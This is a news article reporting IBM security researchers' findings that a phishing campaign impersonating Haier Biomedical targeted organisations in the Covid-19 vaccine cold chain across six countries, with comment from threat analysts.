Since the Covid-19 pandemic began, hackers and scammers have focused extraordinary attention on it, whether for espionage or for grift. Now, as pharmaceutical companies prepare to ship long-awaited vaccines, a new round of sophisticated phishing attacks is focused on the complex supply chain that will get them to people in need.
Two of the leading Covid-19 vaccine candidates, by Pfizer and Moderna, have been submitted to the FDA for emergency authorization; the agency is scheduled to evaluate Pfizer’s application on December 10, and Moderna’s one week later. UK regulators approved Pfizer’s vaccine on Wednesday. Which means that the next challenge for both vaccines is transporting them. They must be kept at frigid temperatures—minus 4 degrees Fahrenheit for Moderna, and 94 degrees below for Pfizer—requiring a network of specialists known as the “cold chain.” Today, security researchers at IBM are releasing findings that a campaign has for months targeted a significant number of those companies, across six different countries.
“This activity took place in September, which means that someone’s looking to get ahead, looking to be where they need to be at the critical moment,” says Claire Zaboeva, senior cyber threat analyst with IBM Security X-Force. “It’s the first time we’ve seen that level of pre-positioning within the context of the pandemic.”
The campaign seems to have focused on companies and organizations associated with Gavi, the Vaccine Alliance’s Cold Chain Equipment Optimization Platform, an effort to streamline and strengthen the cold chain. The only target IBM identified by name was the European Commission’s Directorate-General for Taxation and Customs Union, which among other things determines tax relief associated with transporting vaccines across borders. Seemingly any part of the cold chain was within bounds for the attackers. Other targets mentioned by IBM include manufacturers of solar panels, which might power trucks carrying the vaccine to more remote locations, and a German website developer whose clients include pharmaceutical, biotech, and container transport companies.
The attackers sent emails purporting to be from Haier Biomedical, a Chinese company that advertises itself as “the world’s only complete cold chain provider,” under the guise of routine requests for quotations. The emails contained HTML attachments that asked the recipient to enter their credentials, which the hackers could then harvest to infiltrate the targeted company.
IBM says it doesn’t know if any of the attacks were successful or what the ultimate objective of the campaign might be. “The door is really open,” says Zaboeva. “Once you get the keys to the kingdom, and you’re inside the city walls or on the network, there’s a myriad of objectives that you can attain, whether it’s critical information—like timetables and distribution—or disruptive attacks.”
In a way, the attacks are simply an evolution of what Covid-19 researchers have already been facing for months. In July, officials from the US, UK, and Canada called out Russian hackers for zeroing in on vaccine development. China has also been implicated in an attempt against Moderna this summer. Just this week, The Wall Street Journal reported that apparent North Korean hackers attempted to break into nine health organizations, including pharmaceutical giants Johnson & Johnson and AstraZeneca.
The sustained cyberassault against companies and organizations working on Covid-19 research and vaccines is unsurprising, given the stakes. While not unexpected, that shift in focus to the cold chain is cause for particular concern, given the delicate and urgent nature of vaccine deployment.
“As we shift towards distributing a vaccine for Covid-19, the logistics of this operation will become extremely critical,” says John Hultquist, senior director of analysis at Mandiant Threat Intelligence. “Seemingly mundane security issues could have major repercussions to such a complex and important effort.”